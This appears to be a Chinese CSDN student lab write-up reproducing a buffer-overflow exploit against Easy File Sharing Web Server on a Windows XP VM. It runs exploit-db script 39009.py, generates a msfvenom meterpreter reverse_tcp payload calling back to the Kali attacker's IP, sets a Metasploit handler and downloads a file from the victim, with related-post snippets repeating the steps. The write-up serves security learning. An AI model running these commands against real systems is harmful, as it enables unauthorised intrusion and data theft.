easy file sharing server 漏洞复现

最新推荐文章于 2023-12-20 23:32:08 发布
最新推荐文章于 2023-12-20 23:32:08 发布
阅读量514 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63016521/article/details/128020872
版权

文章目录

  • 实验步骤

二、实验步骤

1:将解压好的easy file sharing web server 拖进xp中安装

2:在xp中打开easy file sharing

3:打开kali 输入ifconfig 并扫描位于同一网段下的存活的主机和其开放的端口

4:使用命令nmap -sV 192.168.179.131 扫描开放端口服务的版本信息

5:使用命令searchsploit easy file sharing 查找渗透模块

6:运行python脚本

路径:/usr/share/exploitdb/windows/remote/39009.py
命令:python /usr/share/exploitdb/windows/remote/39009.py 192.168.179.131 8080

7打开xp靶机即可看到计算器被调用了。

2:

在kali终端中输入msfvenom -p windows/meterpreter/reverse_tcp lhost =192.168.179.132(kali的ip) lport=5000 -f exe -o /home/kali/payload.exe

将生成的payload.exe 拖到xp虚拟机中

在kali终端中输入msfconsole打开metasploit

使用攻击模块,在kali终端中输入

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.179.132

Set lport 5000

Exploit

在xp中运行生成的payload

Kali连接上xp

这里事先在xp的c盘下新建了一个名为hacker.txt文件

使用命令download c:\\test.txt

以root打开kali 在root中可以看到下载的test.txt文件

打不过你菜菜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Easy File Sharing Server漏洞利用
rrorb的博客
11-14 4357
1、以windows系统作为靶机并运行easy file sharing server 2、使用nmap对Windows进行端口扫描 nmap -sV10.**.***.**(windowsip) 扫描到80端口运行了easy file sharing server 3、搜索可利用漏洞脚本 searchsploit Easy File Sharing Web Server 扫描到很多可利用脚本,这里我们选取其中一个作为漏洞脚本利用 4、分析脚本,脚本39009.py使用python编程
远程控制(easy file sharing web server)验证性实验
qq_45538874的博客
11-02 435
实验过程 首先在电脑上打开easy file sharing web server 并设置好端口 进入kali中扫描该软件的漏洞 此时,利用39009溢出漏洞进行验证性实验。进入kali中,输入python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.127.1 8000 此时,kali中的渗透模块就会连接到192.168.127.1的8000端口,并将指定代码发送过去 执行完成后,easy file sharing we
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
漏洞复现Easy File Sharing Web Server 漏洞的简单利用
最新发布
qq_44655084的博客
12-20 1079
EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者可通过向forum.ghp文件发送恶意的登录请求利用该漏洞执行任意代码。
Easy File Sharing Web Server(缓冲区溢出漏洞)
Coffilater的博客
12-13 3423
缓冲区溢出简介 缓冲区溢出是指计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出现缓冲区溢出。 Easy File Sharing Web Server 漏洞复现 实验环境: 攻击机:kali L
Kali Linux 基于Easy File Sharing Web Server 6.9 编写漏洞渗透模块 (上)
xujing19920814的博客
10-05 1342
可以实现对简单文件共享Web服务器的登录测试简单文件共享Web服务器是否存在溢出漏洞。方法很简单,向目标程序发送一个足够长的用户名,查看目标程序的反应即可。我们需要使用pattern_create.rb来产生10000个字符,命令如下可以确定SEH的偏移量为4059这个命令执行的结果是生成,C:\Program Files\ImmunityInc\Immunity Debugger\rop.txt文件。只有其中不受SafeSEH机制保护的才可以使用,也就是表中SafeSEH列值为False的。
实验--easyfilesharing
wow_iamfree的博客
10-17 1578
1.启easyfilesharing 2.查看本机ip(这里为我手机热点连接,看WLAN下的ip) 3.修改好easyfilesharing的访问地址和开发端口,并访问一下 主机上可访问,已经正常启动 4.用虚拟机扫描查看开放的的端口和对应服务 nmap -T4 -V -sV 192.168.43.246 可以看出我的主机开放了一些端口并提供了一些对应的服务,其中8000端口开放了http服务,并显示了其端口上运行软件的版本(稍后会自行百度查找其他的端口开放服务) 既然开放了http服务,就从kal
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 7.2:便捷的文件共享解决方案》 Easy File Sharing Web Server 7.2 是一款高效且易用的文件共享软件,它专为希望通过网络轻松进行文件上传与下载的用户设计。这款系统使得在互联网...
Easy File Sharing Web Server 7.2.zip.7z
12-15
Easy File Sharing Web Server 7.2:文件分享与安全风险》 Easy File Sharing Web Server(简称EFSWS)是一款广泛使用的文件分享软件,它使用户能够通过网页浏览器轻松实现文件的上传和下载。该软件设计简洁,...
easy.file.sharing.web.server.v6.9.rar.7z
12-14
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架...
Easy File Sharing Web Server v5.5
11-06
Easy File Sharing Web Server v5.5:便捷的文件共享解决方案》 Easy File Sharing Web Server v5.5 是一款专为个人和小型企业设计的网络软件,它提供了一个直观且高效的平台,使得用户可以通过Web浏览器轻松地...
Easy File Sharing Web Server 缓冲区溢出漏洞
young的博客
10-22 963
Easy File Sharing Web Server 缓冲区溢出漏洞 一、首先我们需要打开虚拟机,并再windows系统上运行Easy File Sharing Web Server 二、将Easy File Sharing Web Server的端口改为8080,然后按下Restart 三、使用Nmap对目标进行扫描,确定目标主机上运行着这个软件 1.查找目标主机的ip IP查找过程: 2.在Kali Linux 2 中打开一个终端,在其中执行“nmap”命令 输入:nmap -sV 10.
Easy File Sharing Web Server(漏洞)
zzzrrrppp的博客
11-15 2664
实验环境:kali Linux2 WinXP 在靶机打开Easy File Sharing Web Server。 利用kali的nmap扫描靶机,发现提供Easy File Sharing Web Server服务。 用searchsploit Easy File Sharing Web Server指令后,可以看到很多脚本,这里我们使用python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.30.12980脚..
Easy File Sharing Web Server漏洞渗透测试
qq_51634663的博客
12-15 474
复现环境 1、ExpNIS.Windos(靶机) 2、Easy File Sharing Web Server 6.9(软件) 3、Kali-Linux(攻击机) 漏洞复现 1、首先在靶机上安装软件Easy File Sharing Web Server 2018并打开(安装过程较为简单此处不详细说明) 2、在靶机上安装完成后我们还需要找到该靶机,在kali上使用nmap扫描该网段 3、发现靶机IP后,我们使用命令nmap -sV 【目标IP】查看该目标主机上运行的服务,例如在此处我.
kali踩坑指北--searchsploit
weixin_43130853的博客
12-08 2196
一 ·参数介绍: -c, --case [Term] 区分大小写(默认不区分大小写) -e, --exact[Term] 对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t"]. -h, --help 显示帮助 -j, --json [Term] 以JSON格式显示结果 -m, --mirror [EDB-ID] 把一个exp拷贝到当前工作目录,参数后加目标id -o, --overflow [Term] Exploit标题被允许溢出其列 -p, --path
easy file sharing漏洞复现任务
m0_60466340的博客
11-16 3330
在开始利用漏洞之前需要将靶机与进行攻击的主机连接在同一子网下。 网络连接好之后,查找kali的IP地址 之后就可以用nmap扫描同一子网下的所有主机的IP地址了 可以找出靶机的IP地址,再用nmap -sV命令对靶机上运行的服务和软件进行测试 可以看到目标主机的80端口上运行有easy file sharing 这个软件, 然后我们就可以利用这个软件的漏洞了。 再kali的终端查找和easy file sharing相关的漏洞模块 ~# searchsploit easy file s
easy flie漏洞与metasploit被控生成
qq_53099802的博客
11-22 3479
easy flie sharing server漏洞的应用 首先,将easy file sharing server放入靶机(通过文件共享放入) 打开它 配置8000端口 在kali中输入 ,可观察到可用脚本,39009 searchsploit Easy File Sharing Web Server 再输入 python /usr/share/exploitdb/exploits/windows/remote/39009.py 开发靶机的ip 8000 最后观察...
漏洞渗透测试复现easy file sharing server
qq_61947585的博客
11-21 760
渗透测试 easy file sharing server
quick easy ftp server
03-16
"Quick Easy FTP Server" 是一个易于使用的 FTP 服务器软件,可以帮助用户在计算机上建立 FTP 服务器并与其他设备共享文件。 该软件提供了一个简单的用户界面,使得用户可以轻松地配置 FTP 服务器。用户只需要指定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值